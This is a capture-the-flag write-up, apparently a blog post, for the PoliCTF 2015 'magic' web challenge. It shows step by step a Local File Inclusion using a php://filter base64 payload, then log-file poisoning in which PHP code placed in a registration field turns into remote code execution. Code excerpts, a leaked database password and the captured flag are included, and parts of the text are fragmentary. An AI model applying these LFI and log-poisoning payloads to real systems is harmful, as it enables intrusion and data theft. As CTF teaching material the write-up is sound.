I visit this website when I'm sad, contains many magical things that help me to find the solution. Focused on your problem and find "the magic thing" that will help you to solve it.Solution:
1. Go to http://magic.polictf.it/index.php?page=register, and I try Local File Inclusion in "page" parameter with base64 encode php filter.
Ex. http://magic.polictf.it/index.php?page=php://filter/convert.base64-encode/resource=index, and read all php file.
if(isset($_POST["login"])){ if(isset($_POST["username"]) && isset($_POST["password"]) && !is_array($_POST["username"]) && !is_array($_POST["password"])){ $user = new User($_POST["username"], $_POST["password"]); $login = $user -> login(); if($login){ $logger = new Logger(gethostbyaddr($_SERVER["REMOTE_ADDR"]), $user); $logger -> log_access(); header("Location: magic_things.php"); } } }gethostbyaddr function *0*, I go to http://ipinfo.io/ and get my hostname. :)
3. /classes/logger/logger.php, in __construct I see...
public function __construct($host, $user){ $this -> host = $host; $this -> filename = $_SERVER["DOCUMENT_ROOT"]."log/" . $host . "_" . $user->getSurname(); $this -> user = $user; date_default_timezone_set("UTC"); }log_access() function and initLogFile() function have fwrite to write log file. It mean in /log folder have a log file name will concat my hostname and underscore and surname (in register)
Ex. http://magic.polictf.it/log/ppp-127.0.0.1.revip8.asianet.co.th_surname
I can write file :D
4. back to index.php
<div id="content"> <?php include($page.".php"); ?> </div>include function can be execute php code!!
in "surname" field I set to name.php.
5. In "name" and "surname" field I can set to php code. Ex. <?php phpinfo(); ?>, and I select to set php code in "name" field.
public function log_access(){ $active = $this -> user -> isActive(); if(!$active){ $this -> initLogFile(); } $fo = fopen($this -> filename, 'a'); if($fo){ $write = fwrite($fo, date('l jS \of F Y h:i:s A') . " - " . $this -> user -> getUsername() .": log in success\n"); fclose($fo); if($write) return true; else return false; } } public function initLogFile(){ $fo = fopen($this -> filename, 'w+'); if($fo){ $write = fwrite($fo, "name|".$this -> user -> getName().";surname|".$this->user->getSurname().";date_creation|UTC:".date('l jS \of F Y h:i:s A')."\n");//write header in logfile. fclose($fo); if($write){ $this -> user -> setActiveBit(1); return true; } else return false; } }6. In /classes/magic/magic.php, I just LFI to Remote code execution to call __call function.
public function __call($iveNeverSeenAnythingSoMagical, $magicArguments) { $mysqli = new mysqli("localhost", "magic", "nrqdUz4PMKNFZ7iphnzE", "magicchall"); $stmt = $mysqli->prepare("SELECT word FROM magic_word"); $stmt -> execute(); $stmt -> store_result(); $stmt -> bind_result($magic_word); $stmt -> fetch(); echo "I THINK THIS IS THE VERY MAGIC THING: " . $magic_word; session_destroy(); }
Exploitation:
Step 1: Register - http://magic.polictf.it/index.php?page=register
Name: <?php $magic = new Magic(); $magic->__call(); ?>
Surname: icheernoom.php
User: icheernoom
Password: icheernoom
Step 2: Login - http://magic.polictf.it/index.php?page=login
User: icheernoom
Password: icheernoom
Step 3: Access to http://magic.polictf.it/index.php?page=log/ppp-127.0.0.1.revip8.asianet.co.th_icheernoom
Get a flag!
<div id="content"> name|I THINK THIS IS THE VERY MAGIC THING: flag{session_regenerate_id()_is_a_very_cool_function_use_it_whenever_you_happen_to_use_session_start()};surname|icheernoom.php;date_creation|UTC:Saturday 11th of July 2015 06:52:15 PM Saturday 11th of July 2015 06:52:15 PM - icheernoom: log in success </div>My Automate Script:
Explorer:
and more...
Flag: flag{session_regenerate_id()_is_a_very_cool_function_use_it_whenever_you_happen_to_use_session_start()}
ไม่มีความคิดเห็น:
แสดงความคิดเห็น